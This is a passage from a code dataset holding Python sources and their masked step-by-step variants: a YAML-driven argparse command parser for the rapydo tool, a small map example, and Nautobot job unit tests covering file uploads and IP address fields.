# value = pinit_conf.get(key, None)
if value is None:
continue
if not isinstance(value, dict):
# This is a first level option
if key in self.parse_conf['options']:
self.parse_conf['options'][key]['default'] = value
else:
print("\nUnknown parameter {} found in {}\n".format(key, PROJECTRC))
else:
# This is a second level parameter
if key not in self.parse_conf['subcommands']:
print("\nUnknown command {} found in {}\n".format(key, PROJECTRC))
else:
conf = self.parse_conf['subcommands'][key]['suboptions']
for subkey, subvalue in value.items():
if subkey in conf:
conf[subkey]['default'] = subvalue
else:
print("Unknown parameter {}/{} found in {}\n".format(
key, subkey, PROJECTRC))
@staticmethod
def prepare_params(options):
pconf = {}
default = options.get('default')
pconf['default'] = default
myhelp = "{} [default: {}]".format(options.get('help'), default)
pconf['help'] = myhelp
if options.get('type') == 'bool':
if default:
pconf['action'] = 'store_false'
else:
pconf['action'] = 'store_true'
else:
# type and metavar are allowed for bool
pconf['type'] = str
pconf['metavar'] = options.get('metavalue')
if 'alias' in options:
pconf['alias'] = options['alias']
if 'positional' in options:
pconf['positional'] = options['positional']
return pconf
|
normal
|
{
"blob_id": "94559d9fd296acd468c33d6b0541b974575b8852",
"index": 4119,
"step-1": "<mask token>\n\n\nclass ArgParser:\n <mask token>\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass ArgParser:\n <mask token>\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n myhelp = '{} [default: {}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-3": "<mask token>\n\n\nclass ArgParser:\n\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n self.current_args = {}\n self.host_configuration = {}\n self.check_args(args)\n self.read_configuration()\n parser = argparse.ArgumentParser(prog=args[0], description=self.\n parse_conf.get('description'))\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=\n version_string)\n main_command = self.parse_conf.get('action')\n subparsers = parser.add_subparsers(title='Available commands', dest\n =main_command.get('name'), help=main_command.get('help'))\n subparsers.required = True\n mycommands = self.parse_conf.get('subcommands', {})\n for command_name, options in sorted(mycommands.items()):\n subparse = subparsers.add_parser(command_name, help=options.get\n ('description'))\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n current_args_namespace, self.remaining_args = parser.parse_known_args(\n args[1:])\n self.current_args = vars(current_args_namespace)\n self.extra_parser = argparse.ArgumentParser(description=\n 'Custom rapydo commands from your own configuration', add_help=\n False, usage=\"\"\"\n$ rapydo custom CUSTOM_COMMAND\"\"\")\n self.extra_command_parser = self.extra_parser.add_subparsers(title=\n 'Available custom commands', dest='custom', help=\n 'list of custom commands')\n self.extra_command_parser.required = True\n if self.current_args.get('log_level', 'DEPRECATED') != 'DEPRECATED':\n log.warning(\n '--log-level parameter is deprecated, set env variable LOGURU_LEVEL'\n )\n log.verbose('Parsed arguments: {}', self.current_args)\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n myhelp = '{} [default: {}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-4": "<mask token>\nimport os\nimport sys\nimport argparse\nfrom controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE\nfrom controller.conf_utilities import load_yaml_file\nfrom controller import log\n\n\nclass ArgParser:\n\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n self.current_args = {}\n self.host_configuration = {}\n self.check_args(args)\n self.read_configuration()\n parser = argparse.ArgumentParser(prog=args[0], description=self.\n parse_conf.get('description'))\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=\n version_string)\n main_command = self.parse_conf.get('action')\n subparsers = parser.add_subparsers(title='Available commands', dest\n =main_command.get('name'), help=main_command.get('help'))\n subparsers.required = True\n mycommands = self.parse_conf.get('subcommands', {})\n for command_name, options in sorted(mycommands.items()):\n subparse = subparsers.add_parser(command_name, help=options.get\n ('description'))\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n current_args_namespace, self.remaining_args = parser.parse_known_args(\n args[1:])\n self.current_args = vars(current_args_namespace)\n self.extra_parser = argparse.ArgumentParser(description=\n 'Custom rapydo commands from your own configuration', add_help=\n False, usage=\"\"\"\n$ rapydo custom CUSTOM_COMMAND\"\"\")\n self.extra_command_parser = self.extra_parser.add_subparsers(title=\n 'Available custom commands', dest='custom', help=\n 'list of custom commands')\n self.extra_command_parser.required = True\n if self.current_args.get('log_level', 'DEPRECATED') != 'DEPRECATED':\n log.warning(\n '--log-level parameter is deprecated, set env variable LOGURU_LEVEL'\n )\n log.verbose('Parsed arguments: {}', self.current_args)\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError('Wrong \"{}\" option provided.\\n'.format(\n element) +\n \"\"\"Arguments containing '_' are not allowed.\n\"\"\" +\n \"Use '-' instead\\n\")\n\n def read_configuration(self):\n self.parse_conf = load_yaml_file('argparser.yaml', path=os.path.\n dirname(os.path.realpath(__file__)))\n try:\n pinit_conf = load_yaml_file(PROJECTRC, path=os.curdir,\n is_optional=True)\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(PROJECTRC_ALTERNATIVE, path=os.\n curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n for key, value in pinit_conf.items():\n if value is None:\n continue\n if not isinstance(value, dict):\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print('\\nUnknown parameter {} found in {}\\n'.format(key,\n PROJECTRC))\n elif key not in self.parse_conf['subcommands']:\n print('\\nUnknown command {} found in {}\\n'.format(key,\n PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print('Unknown parameter {}/{} found in {}\\n'.\n format(key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n myhelp = '{} [default: {}]'.format(options.get('help'), default)\n pconf['help'] = myhelp\n if options.get('type') == 'bool':\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n else:\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n if 'alias' in options:\n pconf['alias'] = options['alias']\n if 'positional' in options:\n pconf['positional'] = options['positional']\n return pconf\n",
"step-5": "# -*- coding: utf-8 -*-\n\n\"\"\"\nAutomatically create and parse commands\nbased on a YAML configuration file.\n\nNOTE: we can't have a logger here,\nbefore knowing the level of debug.\n\"\"\"\n\nimport os\nimport sys\nimport argparse\nfrom controller import __version__, PROJECTRC, PROJECTRC_ALTERNATIVE\nfrom controller.conf_utilities import load_yaml_file\nfrom controller import log\n\n\nclass ArgParser:\n def __init__(self, args=None):\n if args is None:\n args = sys.argv\n\n self.current_args = {}\n self.host_configuration = {}\n # This method can raise ValueErrors\n self.check_args(args)\n\n # This method saves configuration objects in self\n self.read_configuration()\n\n # Arguments definition\n parser = argparse.ArgumentParser(\n prog=args[0], description=self.parse_conf.get('description')\n )\n\n # PARAMETERS\n sorted_options = sorted(self.parse_conf.get('options', {}).items())\n for option_name, options in sorted_options:\n self.add_parser_argument(parser, option_name, options)\n\n version_string = 'rapydo version {}'.format(__version__)\n parser.add_argument('--version', action='version', version=version_string)\n # Sub-parser of commands [check, init, etc]\n main_command = self.parse_conf.get('action')\n\n subparsers = parser.add_subparsers(\n title='Available commands',\n dest=main_command.get('name'),\n help=main_command.get('help'),\n )\n\n subparsers.required = True\n\n # ##########################\n # COMMANDS\n\n # BASE normal commands\n mycommands = self.parse_conf.get('subcommands', {})\n\n for command_name, options in sorted(mycommands.items()):\n\n # Creating a parser for each sub-command [check, init, etc]\n subparse = subparsers.add_parser(\n command_name, help=options.get('description')\n )\n\n # controlcommands = options.get('controlcommands', {})\n # # Some subcommands can have further subcommands\n # [control start, stop, etc]\n # if len(controlcommands) > 0:\n # innerparser = subparse.add_subparsers(\n # dest='controlcommand'\n # )\n # innerparser.required = options.get('controlrequired', False)\n # for subcommand, suboptions in controlcommands.items():\n # subcommand_help = suboptions.pop(0)\n # # Creating a parser for each sub-sub-command\n # # [control start/stop]\n # innerparser.add_parser(subcommand, help=subcommand_help)\n\n suboptions = options.get('suboptions', {}).items()\n for option_name, suboptions in suboptions:\n self.add_parser_argument(subparse, option_name, suboptions)\n\n # ##########################\n # Print usage if no arguments provided\n if len(args) == 1:\n parser.print_help()\n sys.exit(1)\n\n # ##########################\n # Reading input parameters\n\n # Partial parsing\n # https://docs.python.org/3.4/library/argparse.html#partial-parsing\n # Example\n # https://gist.github.com/von/949337/\n\n # self.current_args = parser.parse_args()\n current_args_namespace, self.remaining_args = parser.parse_known_args(args[1:])\n self.current_args = vars(current_args_namespace)\n\n # custom commands as a separate parser\n self.extra_parser = argparse.ArgumentParser(\n description='Custom rapydo commands from your own configuration',\n add_help=False,\n usage='\\n$ rapydo custom CUSTOM_COMMAND',\n )\n self.extra_command_parser = self.extra_parser.add_subparsers(\n title='Available custom commands',\n dest='custom',\n help='list of custom commands',\n )\n self.extra_command_parser.required = True\n\n # ##########################\n if self.current_args.get(\"log_level\", \"DEPRECATED\") != \"DEPRECATED\":\n # Deprecated since version 0.7.0\n log.warning(\n \"--log-level parameter is deprecated, set env variable LOGURU_LEVEL\")\n\n log.verbose(\"Parsed arguments: {}\", self.current_args)\n\n def add_parser_argument(self, parser, option_name, options):\n params = self.prepare_params(options)\n alias = params.pop('alias', None)\n positional = params.pop('positional', False)\n param_name = '--{}'.format(option_name)\n if positional:\n parser.add_argument(option_name, **params)\n elif alias is None:\n parser.add_argument(param_name, **params)\n else:\n parser.add_argument(param_name, '-{}'.format(alias), **params)\n\n @staticmethod\n def check_args(args):\n # Check on format\n for element in args:\n if element.startswith('--') and '_' in element:\n raise ValueError(\n \"Wrong \\\"{}\\\" option provided.\\n\".format(element)\n + \"Arguments containing '_' are not allowed.\\n\"\n + \"Use '-' instead\\n\"\n )\n # NOTE: the standard is to use only '-' separators for arguments\n # beware: argparse converts them into '_' when you want to retrieve\n\n def read_configuration(self):\n # READ MAIN FILE WITH COMMANDS AND OPTIONS\n\n self.parse_conf = load_yaml_file(\n 'argparser.yaml', path=os.path.dirname(os.path.realpath(__file__))\n )\n\n try:\n # READ PROJECT INIT FILE: .projectrc\n pinit_conf = load_yaml_file(\n PROJECTRC, path=os.curdir, is_optional=True)\n # Allow alternative for PROJECT INIT FILE: .project.yml\n if len(pinit_conf) < 1:\n pinit_conf = load_yaml_file(\n PROJECTRC_ALTERNATIVE, path=os.curdir, is_optional=True)\n except AttributeError as e:\n log.exit(e)\n\n self.host_configuration = pinit_conf.pop('project_configuration', {})\n\n # Mix with parse_conf\n for key, value in pinit_conf.items():\n # value = pinit_conf.get(key, None)\n\n if value is None:\n continue\n\n if not isinstance(value, dict):\n # This is a first level option\n if key in self.parse_conf['options']:\n self.parse_conf['options'][key]['default'] = value\n else:\n print(\"\\nUnknown parameter {} found in {}\\n\".format(key, PROJECTRC))\n else:\n # This is a second level parameter\n if key not in self.parse_conf['subcommands']:\n print(\"\\nUnknown command {} found in {}\\n\".format(key, PROJECTRC))\n else:\n conf = self.parse_conf['subcommands'][key]['suboptions']\n for subkey, subvalue in value.items():\n if subkey in conf:\n conf[subkey]['default'] = subvalue\n else:\n print(\"Unknown parameter {}/{} found in {}\\n\".format(\n key, subkey, PROJECTRC))\n\n @staticmethod\n def prepare_params(options):\n\n pconf = {}\n default = options.get('default')\n pconf['default'] = default\n\n myhelp = \"{} [default: {}]\".format(options.get('help'), default)\n pconf['help'] = myhelp\n\n if options.get('type') == 'bool':\n\n if default:\n pconf['action'] = 'store_false'\n else:\n pconf['action'] = 'store_true'\n\n else:\n # type and metavar are allowed for bool\n pconf['type'] = str\n pconf['metavar'] = options.get('metavalue')\n\n if 'alias' in options:\n pconf['alias'] = options['alias']\n\n if 'positional' in options:\n pconf['positional'] = options['positional']\n\n return pconf\n",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
def func(n):
return n * 2
def my_map(f, seq):
return [f(item) for item in seq]
def main():
numbers = [1, 2, 3, 4]
result = list(map(func, numbers))
print(result)
result = [func(item) for item in numbers]
print(result)
if __name__ == '__main__':
main()
|
normal
|
{
"blob_id": "55acae8129ddaba9a860d5d356e91f40607ac95a",
"index": 8614,
"step-1": "<mask token>\n",
"step-2": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\n<mask token>\n",
"step-3": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\ndef main():\n numbers = [1, 2, 3, 4]\n result = list(map(func, numbers))\n print(result)\n result = [func(item) for item in numbers]\n print(result)\n\n\n<mask token>\n",
"step-4": "def func(n):\n return n * 2\n\n\ndef my_map(f, seq):\n return [f(item) for item in seq]\n\n\ndef main():\n numbers = [1, 2, 3, 4]\n result = list(map(func, numbers))\n print(result)\n result = [func(item) for item in numbers]\n print(result)\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": null,
"step-ids": [
0,
2,
3,
4
]
}
|
[
0,
2,
3,
4
] |
import json
import os
import uuid
from django.core.files.uploadedfile import SimpleUploadedFile
from django.conf import settings
from django.contrib.contenttypes.models import ContentType
from nautobot.dcim.models import Site
from nautobot.extras.choices import JobResultStatusChoices
from nautobot.extras.jobs import get_job, run_job
from nautobot.extras.models import FileAttachment, FileProxy, JobResult
from nautobot.utilities.testing import TestCase
class JobTest(TestCase):
"""
Test basic jobs to ensure importing works.
"""
maxDiff = None
@classmethod
def setUpTestData(cls):
cls.job_content_type = ContentType.objects.get(app_label="extras", model="job")
def test_job_pass(self):
"""
Job test with pass result.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_pass"
name = "TestPass"
job_class = get_job(f"local/{module}/{name}")
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
def test_job_fail(self):
"""
Job test with fail result.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_fail"
name = "TestFail"
job_class = get_job(f"local/{module}/{name}")
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)
def test_field_order(self):
"""
Job test with field order.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_field_order"
name = "TestFieldOrder"
job_class = get_job(f"local/{module}/{name}")
form = job_class().as_form()
self.assertHTMLEqual(
form.as_table(),
"""<tr><th><label for="id_var2">Var2:</label></th><td>
<input class="form-control form-control" id="id_var2" name="var2" placeholder="None" required type="text">
<br><span class="helptext">Hello</span></td></tr>
<tr><th><label for="id_var23">Var23:</label></th><td>
<input class="form-control form-control" id="id_var23" name="var23" placeholder="None" required type="text">
<br><span class="helptext">I want to be second</span></td></tr>
<tr><th><label for="id__commit">Commit changes:</label></th><td>
<input checked id="id__commit" name="_commit" placeholder="Commit changes" type="checkbox">
<br><span class="helptext">Commit changes to the database (uncheck for a dry-run)</span></td></tr>""",
)
def test_no_field_order(self):
"""
Job test without field_order.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_no_field_order"
name = "TestNoFieldOrder"
job_class = get_job(f"local/{module}/{name}")
form = job_class().as_form()
self.assertHTMLEqual(
form.as_table(),
"""<tr><th><label for="id_var23">Var23:</label></th><td>
<input class="form-control form-control" id="id_var23" name="var23" placeholder="None" required type="text">
<br><span class="helptext">I want to be second</span></td></tr>
<tr><th><label for="id_var2">Var2:</label></th><td>
<input class="form-control form-control" id="id_var2" name="var2" placeholder="None" required type="text">
<br><span class="helptext">Hello</span></td></tr>
<tr><th><label for="id__commit">Commit changes:</label></th><td>
<input checked id="id__commit" name="_commit" placeholder="Commit changes" type="checkbox">
<br><span class="helptext">Commit changes to the database (uncheck for a dry-run)</span></td></tr>""",
)
def test_ready_only_job_pass(self):
"""
Job read only test with pass result.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_read_only_pass"
name = "TestReadOnlyPass"
job_class = get_job(f"local/{module}/{name}")
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted
def test_read_only_job_fail(self):
"""
Job read only test with fail result.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_read_only_fail"
name = "TestReadOnlyFail"
job_class = get_job(f"local/{module}/{name}")
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
run_job(data={}, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_ERRORED)
self.assertEqual(Site.objects.count(), 0) # Ensure DB transaction was aborted
# Also ensure the standard log message about aborting the transaction is *not* present
self.assertNotEqual(
job_result.data["run"]["log"][-1][-1], "Database changes have been reverted due to error."
)
def test_read_only_no_commit_field(self):
"""
Job read only test commit field is not shown.
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_read_only_no_commit_field"
name = "TestReadOnlyNoCommitField"
job_class = get_job(f"local/{module}/{name}")
form = job_class().as_form()
self.assertHTMLEqual(
form.as_table(),
"""<tr><th><label for="id_var">Var:</label></th><td>
<input class="form-control form-control" id="id_var" name="var" placeholder="None" required type="text">
<br><span class="helptext">Hello</span><input id="id__commit" name="_commit" type="hidden" value="False"></td></tr>""",
)
def test_ip_address_vars(self):
"""
Test that IPAddress variable fields behave as expected.
This test case exercises the following types for both IPv4 and IPv6:
- IPAddressVar
- IPAddressWithMaskVar
- IPNetworkVar
"""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
module = "test_ipaddress_vars"
name = "TestIPAddresses"
job_class = get_job(f"local/{module}/{name}")
# Fill out the form
form_data = dict(
ipv4_address="1.2.3.4",
ipv4_with_mask="1.2.3.4/32",
ipv4_network="1.2.3.0/24",
ipv6_address="2001:db8::1",
ipv6_with_mask="2001:db8::1/64",
ipv6_network="2001:db8::/64",
)
form = job_class().as_form(form_data)
self.assertTrue(form.is_valid())
# Prepare the job data
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
data = job_class.serialize_data(form.cleaned_data)
# Run the job and extract the job payload data
run_job(data=data, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
job_payload = job_result.data["run"]["log"][0][2] # Indexing makes me sad.
job_result_data = json.loads(job_payload)
# Assert stuff
self.assertEqual(job_result.status, JobResultStatusChoices.STATUS_COMPLETED)
self.assertEqual(form_data, job_result_data)
class JobFileUploadTest(TestCase):
"""Test a job that uploads/deletes files."""
@classmethod
def setUpTestData(cls):
cls.file_contents = b"I am content.\n"
cls.dummy_file = SimpleUploadedFile(name="dummy.txt", content=cls.file_contents)
cls.job_content_type = ContentType.objects.get(app_label="extras", model="job")
def setUp(self):
self.dummy_file.seek(0) # Reset cursor so we can read it again.
def test_run_job_pass(self):
"""Test that file upload succeeds; job SUCCEEDS; and files are deleted."""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
job_name = "local/test_file_upload_pass/TestFileUploadPass"
job_class = get_job(job_name)
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
# Serialize the file to FileProxy
data = {"file": self.dummy_file}
form = job_class().as_form(files=data)
self.assertTrue(form.is_valid())
serialized_data = job_class.serialize_data(form.cleaned_data)
# Assert that the file was serialized to a FileProxy
self.assertTrue(isinstance(serialized_data["file"], uuid.UUID))
self.assertEqual(serialized_data["file"], FileProxy.objects.latest().pk)
self.assertEqual(FileProxy.objects.count(), 1)
# Run the job
run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
# Assert that file contents were correctly read
self.assertEqual(
job_result.data["run"]["log"][0][2], f"File contents: {self.file_contents}" # "File contents: ..."
)
# Assert that FileProxy was cleaned up
self.assertEqual(FileProxy.objects.count(), 0)
def test_run_job_fail(self):
"""Test that file upload succeeds; job FAILS; files deleted."""
with self.settings(JOBS_ROOT=os.path.join(settings.BASE_DIR, "extras/tests/dummy_jobs")):
job_name = "local/test_file_upload_fail/TestFileUploadFail"
job_class = get_job(job_name)
job_result = JobResult.objects.create(
name=job_class.class_path,
obj_type=self.job_content_type,
user=None,
job_id=uuid.uuid4(),
)
# Serialize the file to FileProxy
data = {"file": self.dummy_file}
form = job_class().as_form(files=data)
self.assertTrue(form.is_valid())
serialized_data = job_class.serialize_data(form.cleaned_data)
# Assert that the file was serialized to a FileProxy
self.assertTrue(isinstance(serialized_data["file"], uuid.UUID))
self.assertEqual(serialized_data["file"], FileProxy.objects.latest().pk)
self.assertEqual(FileProxy.objects.count(), 1)
# Run the job
run_job(data=serialized_data, request=None, commit=False, job_result_pk=job_result.pk)
job_result.refresh_from_db()
# Assert that file contents were correctly read
self.assertEqual(
job_result.data["run"]["log"][0][2], f"File contents: {self.file_contents}" # "File contents: ..."
)
# Also ensure the standard log message about aborting the transaction is present
self.assertEqual(job_result.data["run"]["log"][-1][-1], "Database changes have been reverted due to error.")
# Assert that FileProxy was cleaned up
self.assertEqual(FileProxy.objects.count(), 0)
|
normal
|
{
"blob_id": "d2298ad1e4737b983ba6d1f2fff59750137510b5",
"index": 904,
